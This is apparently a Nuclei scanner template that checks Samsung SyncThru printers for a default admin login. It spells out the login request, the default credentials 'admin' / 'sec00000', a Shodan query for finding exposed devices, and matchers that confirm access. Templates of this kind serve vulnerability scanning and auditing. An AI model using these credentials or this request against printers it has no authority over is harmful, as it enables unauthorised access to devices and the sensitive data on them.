Description
Samsung printers contain a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
Samsung printers contain a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
id: samsung-printer-default-login
info:
name: Samsung Printer - Default Login
author: gy741
severity: high
description: |
Samsung printers contain a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://support.hp.com/gb-en/document/c05591673
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:h:samsung:scx-6555n:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"SyncThru Web Service"
product: scx-6555n
vendor: samsung
tags: default-login,iot,samsung,printer,intrusive,vuln
http:
- raw:
- |
POST /sws/app/gnb/login/login.jsp HTTP/1.1
Host: {{Hostname}}
Authentication=Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- admin
password:
- sec00000
matchers-condition: and
matchers:
- type: word
part: body
words:
- "success: true"
- "passwordExpiration"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450221009207c53654561f0a33b3d320b37a128740883c667165dc29d54c457fbc3950690220450583d5bcf6db13297b7e509f235253a48e0d5310fa2abf3d5ae19d59fb2b33:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.